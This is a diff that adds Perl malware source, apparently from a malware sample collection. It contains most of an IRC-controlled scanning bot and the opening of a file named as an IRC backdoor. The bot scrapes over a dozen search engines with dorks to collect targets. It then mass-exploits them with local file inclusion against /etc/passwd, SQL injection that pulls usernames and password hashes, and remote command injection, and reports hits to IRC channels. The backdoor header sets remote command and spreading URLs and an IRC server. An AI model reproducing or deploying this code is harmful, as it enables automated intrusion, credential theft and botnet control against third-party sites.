+            writ1("9,1[%] 15,1 _/ 11,1Exploiting   4,1 ".$count." 11,1 / 4,1 ".scalar(@toexploit)." ");
+        }
+        $forks[$num]=fork();
+        if($forks[$num] == 0){
+            my $inj   = "../../../../../../../../../../../../../etc/passwd%00";
+            my $test  = "http://".$site.$bug.$inj;
+            my $print = "http://".$site.$bug.$inj;
+            my $re    = query($test);
+            if ($re =~ /root:x:/) {
+                writ1("7(7,1LFI7) 9,1$print");
+                writ2("7(7,1LFI7) 9,1$print");
+            }
+            exit(0);
+        }
+        $num++;
+    }
+    foreach my $f(@forks){
+        waitpid($f,0);
+    }
+}
+
+sub sql() {
+    my $bug  = $_[0];
+    my $name = $_[1];
+    my $dork = $_[2]; 
+    my $sqlpid = $_[3]; 
+    my @forks;
+    my $num = 0;
+    open($file, "<", $name);
+    while (my $a = <$file>) {
+        $a =~ s/\n//g;
+        push(@tot,$a);
+    }
+    close($file);
+    remove($name);
+    my @toexploit = unici(@tot);
+    writ1("9,1[*] 4,1>EXPLOITABLES:   11,1 ".scalar(@toexploit)."   15,1 $dork");
+    writ1("4,1[+] 9,1ExPLoItIng STARTED !! ");
+    foreach my $site(@toexploit) {
+        my $test  = "http://".$site.$bug; print "$test\n";
+        $count++;
+        if($count %$sqlpid == 0){
+            foreach my $f(@forks){
+                waitpid($f,0);
+            }
+            $num = 0;
+        }
+        if($count %100 == 0){
+            writ1("9,1[%] 15,1 _/ 11,1Exploiting   4,1 ".$count." 11,1 / 4,1 ".scalar(@toexploit)." ");
+        }
+        $forks[$num]=fork();
+        if($forks[$num] == 0){
+            my $test  = "http://".$site.$bug;
+            my $print = "http://".$site.$bug;
+            my $re    = query($test);
+            if ($re =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
+                my ($user,$hash) = ($1,$2);
+                if ($sqlpid == $sqlpidpr0c) {
+                    writ1("9(9,12SQL INJ9) 15,12$print");
+                    writ1("9(9,12User9) 15,12$user");
+                    writ1("9(9,12Hash9) 15,12$hash");
+                    writ2("9(9,12SQL INJ9) 15,12$print");
+                }
+                elsif  ($sqlpid > $sqlpidpr0c) {
+                    writ1("9(9,12SQL INJ9) 15,12$print");
+                }
+            }
+            elsif ($re =~ m/:(.*)([0-9,a-f]{32})/g) { 
+                my ($user,$hash) = ($1,$2);
+                $user =~ s/\<(.*)\>//g;
+                if ($user !~ /(\/|\<|\>|\")/) {
+                    if ($sqlpid == $sqlpidpr0c) {
+                        writ1("9(9,12SQL INJ9) 15,12$print");
+                        writ1("9(9,12User9) 15,12$user");
+                        writ1("9(9,12Hash9) 15,12$hash");
+                        writ2("9(9,12SQL INJ9) 15,12$print");
+                    }
+                    elsif ($sqlpid > $sqlpidpr0c) {
+                        writ1("9(9,12SQL INJ9) 15,12$print");
+                    }
+                }
+            }
+            elsif ($re =~ m/\"option\"><b>(.*)([0-9,a-f]{32})/g) {
+                my ($user,$hash) = ($1,$2);
+                $user =~ s/<(.*)>//g;
+                $user =~ s/<|>//g;
+                if ($sqlpid == $sqlpidpr0c) {
+                    writ1("9(9,12SQL INJ9) 15,12$print");
+                    writ1("9(9,12User9) 15,12$user");
+                    writ1("9(9,12Hash9) 15,12$hash");
+                    writ2("9(9,12SQL INJ9) 15,12$print");
+                }
+                elsif  ($sqlpid > $sqlpidpr0c) {
+                    writ1("9(9,12SQL INJ9) 15,12$print");
+                }
+            }
+            exit(0);
+        }
+        $num++;
+    }
+    foreach my $f(@forks){
+        waitpid($f,0);
+    }
+}
+
+sub rce() {
+    my $bug  = $_[0];
+    my $name = $_[1];
+    my $dork = $_[2];
+    my $rcepid = $_[3];
+    my @forks;
+    my $num = 0;
+    open($file, "<", $name);
+    while (my $a = <$file>) {
+        $a =~ s/\n//g;
+        push(@tot, $a);
+    }
+    close($file);
+    remove($name);
+    my @toexploit = unici(@tot);
+    writ1("9,1[*] 4,1>EXPLOITABLES:   11,1 ".scalar(@toexploit)."   15,1 $dork");
+    writ1("4,1[+] 9,1ExPLoItIng STARTED !! ");
+    foreach my $site(@toexploit) {
+        $count++;
+        if ($count % $rcepid == 0) {
+            foreach my $f(@forks){
+                waitpid($f,0);
+            }
+            $num = 0;
+        }
+        if ($count % 300 == 0) {
+            writ1("9,1[%] 15,1 _/ 11,1Exploiting   4,1 ".$count." 11,1 / 4,1 ".scalar(@toexploit)." ");
+        }
+        $forks[$num]=fork();
+        if($forks[$num] == 0){
+            my $inj   = "|echo%20%22Osirys-p0wa%22;%20id|";
+            my $inj1  = "|echo%20%22Osirys-p0wa%22;%20id";
+            my $osinj = "|uname%20-a|";
+            my $test  = "http://".$site.$bug.$inj;print "$test\n";
+            my $test1 = "http://".$site.$bug.$inj1;
+            my $os    = "http://".$site.$bug.$osinj;
+            my $re    = query($test);
+            my $re1   = query($test1);
+            if ($re =~ /Osirys-p0wa/ && $re =~ /uid=(.+?) gid/) {
+                rce_os($os);
+                writ1("0(0,12RCE0) 0,12$test");
+                writ1("0(0,12OS0) 0,12$un_rce");
+                writ2("0(0,12RCE0) 0,12$test");
+            }
+            if ($re1 =~ /Osirys-p0wa/ && $re1 =~ /uid=(.+?) gid/) {
+                rce_os($os);
+                writ1("0(0,12RCE0) 0,12$test1");
+                writ1("0(0,12OS0) 0,12$un_rce");
+                writ2("0(0,12RCE0) 0,12$test1");
+            }
+            exit(0);
+        }
+        $num++;
+    }
+    foreach my $f(@forks){
+        waitpid($f,0);
+    }
+}
+
+sub G_Super() {
+    my @domain  = ("at","com.au","com.br","ca","ch","cn","de","dk","es","fr","it","co.jp","com.mx","co.uk");
+    my @langs   = ("de","en","br","en","de","cn","de","dk","es","fr","it","jp","es","en");
+    my @country = ("AT","AU","BR","CA","CH","CN","DE","DK","ES","FR","IT","JP","MX","UK");
+    my $dork = $_[0];
+    my $fname = $_[1];
+    my @forks;
+    my $count = 0;
+    my $dd = 0;
+    my $l = 0;
+    my $c = 0;
+    foreach my $d(@domain) {
+        if ($count % 1 == 0) {
+            foreach my $f(@forks){
+                waitpid($f,0);
+            }
+        }
+        $forks[$count] = fork();
+        if ($forks[$count] == 0) {
+            for ($i=0;$i<=1000;$i+=100) {
+                my $gsup = ("www.google.".$d."/search?q=".key($dork)."&num=100&hl=".$langs[$l]."&cr=country".$country[$c]."&as_qdr=all&start=".$i."&sa=N");
+                my $re = query1($gsup);
+                while ($re =~ m/<a href=\"http:\/\/(.+?)\" class=l/g) {
+                    my $h = $1;
+                    if ($h !~ /google|<|>/) {
+                        push(@sgrep,$h);
+                    }
+                }
+            }
+            my @list = &fprint($fname,@sgrep);
+            writ1("9,1[*] 4,1>GOOGLE[9,1".$domain[$dd]."4,1] : 11,1 ".scalar(@list)." 9,1 > 15,1 $dork");
+            exit(0);
+        }
+        $l++;
+        $c++;
+        $count++;
+        $dd++;
+    }
+    foreach my $f(@forks){
+	waitpid($f,0);
+    }
+}
+
+sub A_Super() {
+    my $dork = $_[0];
+    my @d00rk = ("at","com.au","com.br","ca","ch","cn","de","dk","es","fr","it","com.mx","co.uk");
+    my $fname = $_[1];
+    my @forks;
+    my $count = 0;
+    my $dd = 0;
+    foreach my $d(@d00rk) {
+        my $d0rk = "$dork domain:".$d00rk[$dd];
+        if ($count % 1 == 0) {
+            foreach my $f(@forks){
+                waitpid($f,0);
+            }
+        }
+        $forks[$count] = fork();
+        if ($forks[$count] == 0) {
+            for ($i=0;$i<=1000;$i+=100) {
+                my $asup = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($d0rk)."&o=".$i);
+                my $re = query($asup);
+                while ($re =~ m/<span class=\"resURL\">http:\/\/(.+?) <\/span>/g) {
+                    my $h = $1;
+                    if ($h !~ /youtube|wikipedia/) {
+                        push(@sgrep,$h);
+                    }
+                }
+            }
+            my @list = &fprint($fname,@sgrep);
+            writ1("9,1[*] 4,1>ALLTHEWEB[9,1".$d00rk[$dd]."4,1] : 11,1 ".scalar(@list)." 9,1 > 15,1 $dork");
+            exit(0);
+        }
+        $count++;
+        $dd++;
+    }
+    foreach my $f(@forks){
+	waitpid($f,0);
+    }
+}
+
+sub Y_Super() {
+    my @domain  = ("at","au","br","ca","de","es","fr","it","uk");
+    my $dork = $_[0];
+    my $fname = $_[1];
+    my @forks;
+    my $count = 0;
+    my $dd = 0;
+    foreach my $d(@domain) {
+        if ($count % 1 == 0) {
+            foreach my $f(@forks){
+                waitpid($f,0);
+            }
+        }
+        $forks[$count] = fork();
+        if ($forks[$count] == 0) {
+            for ($i=0;$i<=1000;$i+=100) {
+                my $ysup = ("http://".$d.".search.yahoo.com/search?p=".key($dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=r&fl=0&fr=yfp-t-501&pstart=1&b=".$i);
+                my $re = query($ysup);
+                while ($re =~ m/<a class=\"yschttl\" href=\"http:\/\/(.+?)\" >/g) {
+                    my $h = $1;
+                    if ($h !~ /yahoo|<|>/) {
+                        push(@sgrep,$h);
+                    }
+                }
+            }
+            my @list = &fprint($fname,@sgrep);
+            writ1("9,1[*] 4,1>YAHOO[9,1".$domain[$dd]."4,1] : 11,1 ".scalar(@list)." 9,1 > 15,1 $dork");
+            exit(0);
+        }
+        $count++;
+        $dd++;
+    }
+    foreach my $f(@forks){
+	waitpid($f,0);
+    }
+}
+
+sub M_Super() {
+    my @domain  = ("at","au","br","ca","de","fr","it");
+    my $dork = $_[0];
+    my $fname = $_[1];
+    my @forks;
+    my $count = 0;
+    my $dd = 0;
+    foreach my $d(@domain) {
+        my $d0 = "$d-$d";
+        if ($count % 1 == 0) {
+            foreach my $f(@forks){
+                waitpid($f,0);
+            }
+        }
+        $forks[$count] = fork();
+        if ($forks[$count] == 0) {
+            for ($i=1;$i<=501;$i+=10) {
+                my $msup = ("http://search.live.com/results.aspx?q=".key($dork)."&first=".$i."&FORM=PERE&FORM=MSNH&mkt=".$d0."&setlang=".$d0);
+                my $re = query($msup);
+                while ($re =~ m/<a href=\"http:\/\/(.+?)\" onmousedown/g) {
+                    my $h = $1;
+                    if ($h !~ /msn|live\.com|microsoft|WindowsLiveTranslator\.com/) {
+                        push(@sgrep,$h);
+                    }
+                }
+            }
+            my @list = &fprint($fname,@sgrep);
+            writ1("9,1[*] 4,1>MSN[9,1".$domain[$dd]."4,1] : 11,1 ".scalar(@list)." 9,1 > 15,1 $dork");
+            exit(0);
+        }
+        $count++;
+        $dd++;
+    }
+    foreach my $f(@forks){
+	waitpid($f,0);
+    }
+}
+
+sub google() {
+    my @gsites;
+    my $dork = $_[0];
+    my $name = $_[1];
+    my $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N");
+    my $re = query1($gtest);
+    if ($re =~ /Google Home/) {
+        @gsites = gfind($dork,$name);
+    }
+    else {
+        writ1("4,1[!] 4,1Banned by Google Engine, BYPASS started !");
+        @gsites = gbypass($dork,$name);
+    }
+    return @gsites;
+}
+
+sub gfind() {
+    my $dork = $_[0];
+    my $name= $_[1];
+    for ($i = 0;$i <= 1200; $i += 100) {
+        my $glink = ("www.google.it/search?q=".key($dork)."&num=100&hl=it&as_qdr=all&start=".$i."&sa=N");
+        my $re = query1($glink);
+        while ($re =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
+            my $h = $1;
+            if ($h !~ /google/) {
+                push(@sgrep,$h);
+            }
+        }
+    }
+    my @list = fprint($name,@sgrep);
+    return @list;
+}
+
+sub gbypass() { # Euroseek uses the same search type of google
+    my $dork  = $_[0];
+    my $name = $_[1];
+    for ($i = 0 ;$i <= 1000 ;$i += 10) {
+        my $gplink = ("http://euroseek.com/system/search.cgi?language=en&mode=internet&start=".$i."&string=".key($dork));
+        my $re = query($gplink);
+        while ($re =~ m/<a href=\"http:\/\/(.+?)\" class=\"searchlinklink\">/g) {
+            my $h = $1;
+            push(@sgrep,$h);
+        }
+    }
+    my @list = fprint($name,@sgrep);
+    return @list;
+}
+
+sub alltheweb() {
+    my $dork  = $_[0];
+    my $name = $_[1];
+    for ($i = 0;$i <= 1000;$i += 100) {
+        my $alink = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($dork)."&o=".$i);
+        my $re = query($alink);
+        while ($re =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g) {
+            my $h = $1;
+            $h =~ s/ //g;
+            push(@sgrep,$h);
+        }
+     }
+     my @list = fprint($name,@sgrep);
+     return @list;
+}
+
+sub altavista() {
+    my $dork  = $_[0];
+    my $name = $_[1];
+    my $atest = ("http://it.altavista.com/web/results?itag=ody&q=".key($dork)."&kgs=0&kls=1");
+    my $re = query($atest);
+    if ($re =~ /Sono stati trovati 0 risultati/) {
+        return @list;
+    }
+    else {
+        for ($i = 0;$i <= 1000;$i += 50){
+            my $alink = ("http://it.altavista.com/web/results?itag=ody&kgs=0&q=".key($dork)."&stq=".$i);
+            my $re = query($alink);
+            while ($re =~ m/<span class=ngrn>(.+?)<\/span>/g) {
+                my $h = $1;
+                push(@sgrep,$h);
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+sub msn() {
+    my $dork  = $_[0];
+    my $name = $_[1];
+    for ($i = 1;$i <= 800;$i += 10) {
+        my $mlink = ( "http://search.live.com/results.aspx?q=".key($dork)."&first=".$i."&FORM=PERE" );
+        my $re = query($mlink);
+        while ($re =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
+            my $h = $1;
+            if ($h !~ /msn|live/ ) {
+                push(@sgrep,$h);
+            }
+        }
+    }
+    my @list = fprint($name,@sgrep);
+    return @list;
+}
+
+sub yahoo() {
+    my @ysites;
+    my $dork = $_[0];
+    my $name = $_[1];
+    my $ytest = ("http://search.yahoo.com/search?p=".key($dork)."&fr=yfp-t-501&ei=UTF-8&rd=r1");
+    my $re = query($ytest);
+    if ($re =~ /We did not find results for: <strong>/) {
+        return @ysites;
+    }
+    elsif ($re =~ /Yahoo! Search results/) {
+        @ysites = yfind($dork,$name);
+        return @ysites;
+    }
+    else {
+        writ1("4,1[!] 4,1Banned by Yahoo Engine, BYPASS started!");
+        @ysites = ybypass($dork,$name);
+        return @ysites;
+    }
+}
+
+sub yfind() {
+    my $dork  = $_[0];
+    my $name = $_[1];
+    for ($i = 1;$i <= 901;$i += 100) {
+        my $ylink = ("http://search.yahoo.com/search?p=".key($dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=r&fl=0&fr=yfp-t-501&pstart=1&b=".$1);
+        my $re = query($ylink);
+        while ($re =~ m/<a class=\"yschttl\" href=\"http:\/\/(.+?)\" >/g) {
+            my $h = $1;
+            if ($h !~ /yahoo|<|>/) {
+                push(@sgrep,$h);
+            }
+        }
+    }
+    my @list = fprint($name,@sgrep);
+    return @list;
+}
+
+sub ybypass() { # GoodSearch uses the same search type of Yahoo
+    my $dork  = $_[0];
+    my $name = $_[1];
+    my $ybytest = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($dork)."&page=1&osmax=16");
+    my $re = query($ybytest);
+    if ($re =~ /Your search did not yield any results/){
+        return @list;
+    }
+    else {
+        for $i(1..50){
+            my $ybylink = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($dork)."&page=".$i."&osmax=16");
+            my $re = query($ybylink);
+            while ($re =~ m/href=\"(.+?)\">(.+?)<\/a>/g) {
+                my $h = $2;
+                if (($h =~ /\./) && ($h !~ /<|>| /)){
+                    push(@sgrep,$h);
+                }
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+
+sub gigablast() { 
+    my $dork  = $_[0];
+    my $name = $_[1];
+    my $gtest = ("http://www.gigablast.com/index.php?n=10&k5p=215334&q=".key($dork)."&submit.x=0&submit.y=0");
+    my $re = query($gtest);
+    if ($re =~ /No results found for/){
+        return @list;
+    }
+    else {
+        for ($i = 0; $i <= 1000; $i += 10) {
+            my $glink = ("http://www.gigablast.com/index.php?q=".key($dork)."&submit_x=929&submit_y=168&k9j=686621&s=".$i."&n=10&");
+            my $re = query($glink);
+            while ($re =~ m/href=\"http:\/\/(.+?)\">/g) {
+                my $h = $1;
+                if ($h !~ /web\.archive|gigablast/){
+                    push(@sgrep,$h);
+                }
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+sub ask() {
+    my $dork = $_[0]; 
+    my $name = $_[1];
+    my $atest = ("http://it.ask.com/web?q=".key($dork)."&qsrc=1&o=312&l=dir&dm=all");
+    my $re = query($atest);
+    if ($re =~ /non ha prodotto alcun risultato/) {
+        return @list;
+    }
+    else {
+        for ($i = 0;$i <= 20;$i ++){
+            my $alink = ("http://it.ask.com/web?q=".key($dork)."&o=0&l=dir&qsrc=0&qid=612B74535B00F6CA7678625658F9B98C&dm=all&page=".$i);
+            my $re = query($alink);
+            while($re =~ m/href=\"http:\/\/(.+?)\"/g){
+                my $h = $1;
+                if ($h !~ /ask|wikipedia/){
+                    push(@sgrep,$h);
+                }
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+## Aol doesn't work, don't know why. When i try to make a http request on aol host, this is the message that i received: You don't have permission to access /aol/search
+## Don't know hot to fix it :S Anyway you have here the sub, so you can try to fix this problem
+
+sub aol() {
+    my $dork = $_[0]; 
+    my $name = $_[1];
+    my $atest = ("http://search.aol.com/aol/search?invocationType=topsearchbox.search&query=".key($dork));
+    my $re = query($atest);
+    if ($re =~ /returned no results\.<\/h3>/) {
+        return @list;
+    }
+    else {
+        for $i(1..100){
+            my $alink = ("http://search.aol.com/aol/search?query=".key($dork)."&page=".$i."&nt=SG2&do=Search&invocationType=comsearch30&clickstreamid=3154480101243260576");
+            my $re = query($alink);print "$re\n";
+            while($re =~ m/\"deleted\" property=\"f:url\">http:\/\/(.+?)<\/p>/g) {
+                my $h = $1;
+                push(@sgrep,$h);
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+sub dmoz() {
+    my $dork = $_[0];
+    my $name = $_[1];
+    my $dtest = ("http://search.dmoz.org/cgi-bin/search?search=".key($dork));
+    my $re = query($dtest);
+    if ($re =~ m/No <b><a href=\"http:\/\/dmoz.org\/\">Open Directory Project<\/a><\/b> results found/g){
+        return @list;
+    }
+    elsif ($re =~ /of (.+?)\)<p>/){
+        my $ftot = $1;
+        if ($ftot <= 20) {
+            $max = 1;
+        }
+        else {
+            my $to = $ftot / 20;
+            if ($to =~ /(.+).(.+?)/){
+                $uik = $1 * 20;
+                $max = $uik +1;
+            }
+            elsif ($to =~ /[0-9]/) {
+                my $to--;
+                my $rej = $to * 20;
+                $max = $rej +1;
+            }
+        }
+    }
+    for ($i = 1;$i <= $max;$i += 20){
+        my $dlink = ("http://search.dmoz.org/cgi-bin/search?search=".key($dork)."&utf8=1&locale=it_it&start=".$i);
+        my $re = query($dlink);
+        while($re =~ m/<a href=\"http:\/\/(.+?)\"/g) {
+            my $h = $1;
+            if ($h !~ /dmoz/){
+                push(@sgrep,$h);
+            }
+        }
+    }
+    my @list = fprint($name,@sgrep);
+    return @list;
+}
+
+sub webde() {
+    my $dork = $_[0]; 
+    my $name = $_[1];
+    for $i(1..50){
+        my $wlink = ("http://suche.web.de/search/web/?pageIndex=".$i."&su=".key($dork)."&y=0&x=0&mc=suche@web@navigation@zahlen.suche@web");
+        my $re = query($wlink);
+        while($re =~ m/href=\"http:\/\/(.+?)\">/g) {
+            my $h = $1;
+            if ($h !~ /\/search\/web|web.de|\" class=\"neww\"/){
+                push(@sgrep,$h);
+            }
+        }
+    }
+    my @list = fprint($name,@sgrep);
+    return @list;
+}
+
+sub einet() {
+    my $dork = $_[0]; 
+    my $name = $_[1];
+    my $etest = ("http://www.einet.net/view/search.gst?p=1&k=".key($dork)."&s=0&submit=Search");
+    my $re = query($etest);
+    if ($re =~ /<span class=nPage>Page 1 of\s+(.+?)<\/span>/){
+        my $tot = $1;
+        for ($i = 1;$i <= $tot;$i++){
+            my $elink = ("http://www.einet.net/view/search.gst?p=".$i."&k=".key($dork)."&s=0&submit=Search");
+            my $re = query($elink);
+            while($re =~ m/<span class=url2>\s+(.+?)<\/span>/g) {
+                my $h = $1;
+                push(@sgrep,$h);
+            }
+        }
+    }
+    my @list = fprint($name,@sgrep);
+    return @list;
+}
+
+sub uol() {
+    my $dork = $_[0]; 
+    my $name = $_[1];
+    my $utest = ("http://busca.uol.com.br/www/index.html?q=".key($dork)."&ad=on");
+    my $re = query($test1);
+    if ($re =~ /n??o retornou nenhum resultado/) {
+        return @list;
+    }
+    else {
+        for($i = 0;$i <= 360;$i +=10) {
+            my $uollink = ("http://busca.uol.com.br/www/index.html?ad=on&q=".key($dork)."&start=".$i);
+            my $re = query($uollink);
+            while($re =~ m/<dt><a href=\"http:\/\/(.+?)\">/g) {
+                my $h = $1;
+                push(@sgrep,$h);
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+sub abacho() {
+    my $dork = $_[0];
+    my $name = $_[1];
+    my $atest = ("http://search.abacho.com/it/abacho.it/index.cfm?q=".key($dork)."&country=it&x=0&y=0");
+    my $re = query($atest);
+    if ($re =~ /We didn't find any results matching your query/) {
+        return @list;
+    }
+    else {
+        for ($i = 0;$i <= 1000; $i += 10) {
+            my $alink = ("http://search.abacho.com/it/abacho.it/index.cfm?offset=".$i."&poffset=0&StartCounter=".$i."&q=".key($dork)."&a=&b=&country=it&page=&d_html=&d_pdf=&d_msdoc=&d_xls=&d_ppt=&mesearchkey=&cluster=&coop=");
+            my $re = query($alink);
+            while ($re =~ m/target=\"_blank\">http:\/\/(.+?)<\/a>/g) {
+                my $h = $1;
+                push(@sgrep,$h);
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+sub trovatore() {
+    my $dork = $_[0];
+    my $name = $_[1];
+    my $ttest = ("http://213.215.201.230/search.jsp?query=".key($dork)."&langselect=all&hitsPerPage=10&hitsPerSite=1&clustering=&filterResults=null&start=0");
+    my $re = query($ttest);
+    if ($re =~ /Risultati <b>0-0<\/b>/) {
+        return @list;
+    }
+    else {
+        for ($i = 0;$i <= 2500; $i += 10) {
+            my $tlink = ("http://213.215.201.230/search.jsp?query=".key($dork)."&langselect=all&hitsPerPage=10&hitsPerSite=1&clustering=&filterResults=null&start=".$i);
+            my $re = query($tlink);
+            while($re =~ m/<a href=\"http:\/\/(.+?)\">/g) {
+                my $h = $1;
+                if ($h !~ /iltrovatore\.it|213\.215\.201\.230|microsoft|wikipedia/){
+                    push(@sgrep,$h);
+                }
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+sub lycos() {
+    my $dork = $_[0];
+    my $name = $_[1];
+    my $ltest = ("http://cerca.lycos.it/cgi-bin/pursuit?pag=0&query=".key($dork)."&cat=web&enc=utf-8&xargs=");
+    my $re = query($ltest);
+    if ($re =~ /non ha avuto esito positivo tra/) {
+        return @list;
+    }
+    else {
+        for $i(0..79) {
+            my $llink = ("http://cerca.lycos.it/cgi-bin/pursuit?pag=".$i."&query=".key($dork)."&cat=web&enc=utf-8");
+            my $re = query($llink);
+            while($re =~ m/title=\"\" >http:\/\/(.+?)<\/a>/g) {
+                my $h = $1;
+                if ($h !~ /youtube|google|wikipedia|microsoft/){
+                    push(@sgrep,$h);
+                }
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+sub walhello() {
+    my $dork = $_[0];
+    my $name = $_[1];
+    my $wtest = ("http://www.walhello.info/search?key=".key($dork)."&taal=a&nummer=0&&web=no&&vert=2&");
+    my $re = query($wtest);
+    if ($re =~ /Verzeihung, Nichts gefunden/) {
+        return @list;
+    }
+    else {
+        for $i(0..99) {
+            my $wlink = ("http://www.walhello.info/search?key=".key($dork)."&taal=a&nummer=".$i."&&web=no&&vert=2&");
+            my $re = query($wlink);
+            while($re =~ m/<a href=http:\/\/(.+?)>/g) {
+                my $h = $1;
+                if ($h !~ /walhello|microsoft|wikipedia/){
+                    push(@sgrep,$h);
+                }
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+sub virgilio() {
+    my $dork = $_[0];
+    my $name = $_[1];
+    my $vtest = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&Cerca=&lr=");
+    my $re = query($vtest);
+    if ($re =~ /<span>Controlla che tutte le parole siano state digitate correttamente<\/span>/) {
+        return @list;
+    }
+    else {
+        for ($i = 0;$i <= 800; $i += 10) {
+            my $vlink = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&filter=1&site=&lr=&hits=10&offset=".$i);
+            my $re = query($vlink);
+            while($re =~ m/<span><a href=\"http:\/\/(.+?)\">/g) {
+                my $h = $1;
+                if ($h !~ /microsoft|wikipedia/){
+                    push(@sgrep,$h);
+                }
+            }
+        }
+        my @list = fprint($name,@sgrep);
+        return @list;
+    }
+}
+
+sub admin() {
+    my $nick = $_[0];
+    my $cheek;
+    @admins;
+    foreach my $a(@admins) {
+        if ($nick eq $a) {
+            $cheek = 1;
+        }
+    }
+    return $cheek;
+}
+
+sub remove() {
+    my $file = @_;
+    foreach my $f(@_){
+        system("rm -rf $f");
+    }
+}
+
+sub clean() {
+    $dork = $_[0];
+    if ( $dork =~ /inurl:|allinurl:|intext:|allintext:|intitle:|allintitle:/ ) {
+        writ1("15,1[+] 4,1Cleaning Dork from Google Search Keys !");
+        $dork =~ s/^inurl://g;
+        $dork =~ s/^allinurl://g;
+        $dork =~ s/^intext://g;
+        $dork =~ s/^allintext://g;
+        $dork =~ s/^intitle://g;
+        $dork =~ s/^allintitle://g;
+    }
+    return $dork;
+}
+
+sub key() {
+    my $dork = $_[0];
+    $dork =~ s/ /\+/g;
+    $dork =~ s/:/\%3A/g;
+    $dork =~ s/\//\%2F/g;
+    $dork =~ s/&/\%26/g;
+    $dork =~ s/\"/\%22/g;
+    $dork =~ s/,/\%2C/g;
+    $dork =~ s/\\/\%5C/g;
+    return $dork;
+}
+
+sub fprint() {
+    my($name,@sgrep) = @_;
+    my @list;
+    foreach my $n(@sgrep) {
+
+
+        my @grep = &links($n);
+        push(@list,@grep);
+    }
+    open($file, ">>", $name);
+    foreach my $h(@list) {
+        print $file "$h\n";
+    }
+    close($file);
+    return @list;
+}
+
+sub links() {
+    my @l;
+    my $link = $_[0];
+    my $host = $_[0];
+    my $hdir = $_[0];
+    $hdir =~ s/(.*)\/[^\/]*$/\1/;
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $host .= "/";
+    $link .= "/";
+    $hdir .= "/";
+    $host =~ s/\/\//\//g;
+    $hdir =~ s/\/\//\//g;
+    $link =~ s/\/\//\//g;
+    push(@l, $link, $host, $hdir);
+    return @l;
+}
+
+sub unici {
+    my @unici = ();
+    my %visti = ();
+    foreach my $elemento (@_) {
+        $elemento =~ s/\/+/\//g;
+        next if $visti{$elemento}++;
+        push @unici, $elemento;
+    }
+    return @unici;
+}
+
+sub os() {
+    my $site = $_[0];
+    my $re  = &query($site);
+    while ($re =~ m/<br>uname -a:(.+?)\<br>/g) {
+        $un = $1;
+    }
+    while ($re =~ m/<br>os:(.+?)\<br>/g) {
+        $os = $1;
+    }
+    while ($re =~ m/<br>id:(.+?)\<br>/g) {
+        $id1 = $1;
+    }
+    while ($re =~ m/<br>free:(.+?)\<br>/g) {
+        $free = $1;
+    }
+    while ($re =~ m/<br>used:(.+?)\<br>/g) {
+        $used = $1;
+    }
+    while ($re =~ m/<br>total:(.+?)\<br>/g) {
+        $all = $1;
+    }
+}
+
+sub rce_os() {
+    my $site = $_[0];
+    my $re = &query($site);
+    while ($re =~ m/^(.*)$/g) {
+        $un_rce = $1;
+    }
+}
+
+sub cheek() {
+    if (($auth !~ /Osirys/)||($authmail !~ /osirys/)) {
+        print "\nI hate rippers, before putting your nick on a script, be sure that you coded it!\nby Osirys // Third Eye Security\n\n"; 
+        exec("rm -rf $0 && pkill perl");
+    }
+}
+
+sub query() {
+    $link = $_[0];
+    my $req = HTTP::Request->new(GET => $link);
+    my $ua = LWP::UserAgent->new();
+    $ua->timeout(4);
+    my $response = $ua->request($req);
+    return $response->content;
+}
+
+sub query1() {
+    my $url = $_[0];
+    my $host  = $url;
+    my $query = $url;
+    $host  =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $query =~ s/$host//;
+    eval {
+        my $sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || return;
+        print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+        my @r = <$sock>;
+        $page = "@r";
+        close($sock);
+    };
+    return $page;
+}
+
+sub writ1() {
+    my $cont = $_[0];
+    print $c0n "PRIVMSG $chan1 :$cont\n";
+}
+
+sub writ2() {
+    my $cont = $_[0];
+    print $c0n "PRIVMSG $chan2 :$cont\n";
+}
+
+sub pm() {
+    my $nick = $_[0];
+    my $cont = $_[1];
+    print $c0n "PRIVMSG $nick :$cont\n";
+}
+
+## PRIVATE
+## Coded by Osirys
+
+
diff --git a/Perl/Backdoor.Perl.IRCBot.n b/Perl/Backdoor.Perl.IRCBot.n
new file mode 100644
index 00000000..73f10218
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.n
@@ -0,0 +1,1860 @@
+
+$process   = "/usr/sbin/ateam";
+my $printcmd  = "http://freewebtown.com/eridjon/cmdd.txt??";
+my $id        = "http://unisel.t35.com/abe.txt?";
+my $spread    = "http://unisel.t35.com/t.txt";
+my $ircserver = "irc.malaysiairc.org"; 
+my $start     = "!scan";
+my $port      = "6667";
+my $nickname  = "TettHost" . int( rand(999) ) . "]";
